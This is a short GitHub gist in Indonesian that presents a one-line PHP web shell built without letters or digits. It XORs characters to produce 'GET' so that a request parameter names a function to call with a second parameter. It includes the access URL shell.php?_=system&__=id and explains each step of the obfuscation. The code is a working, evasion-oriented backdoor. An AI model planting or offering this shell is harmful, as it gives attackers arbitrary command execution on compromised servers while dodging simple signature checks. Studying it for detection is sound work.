Skip to content

Instantly share code, notes, and snippets.

@vsec7

vsec7/Non-Alphanumeric_WebShell.md

Created July 27, 2020 11:54
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Non-Alphanumeric WebShell PHP explaination
Raw
Non-Alphanumeric_WebShell.md

Non-Alphanumeric WebShell PHP

Code :

<?php $_='{';$_=($_^'<').($_^'>;').($_^'/');${'_'.$_}['_'](${'_'.$_}['__']);

Cara Akses :

shell.php?_=system&__=id

Penjelasan Singkat

Dilihat dari code nya terdapat 3 part flow nya.

part 1

$_='{';

variable $_ menampung string {

part 2

$_=($_^'<').($_^'>;').($_^'/');

** Note: Di PHP, $variable bs di reuse **

  • Manipulasi utk mendapatkan char yg diinginkan dengan XOR ^
($_^'<').($_^'>;').($_^'/');

Step awal kan var $_ menampung { Kita sederhanakan biar gampang dipahami:

echo ('{'^'<').('{'^'>;').('{'^'/');
output : GET

variable $_ di reuse dan ditimpa value nya jadi GET, sekarang variable $_ menampung string GET

Part 3

${'_'.$_}['_'](${'_'.$_}['__']);
${'_'.GET}['_'](${'_'.GET}['__']);
$_GET['_']($_GET['__'])

Sehingga jika diakses GET ?_=system&__=id

var _ menjadi function var __ menjadi value nya

system(id)

~ Ve

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment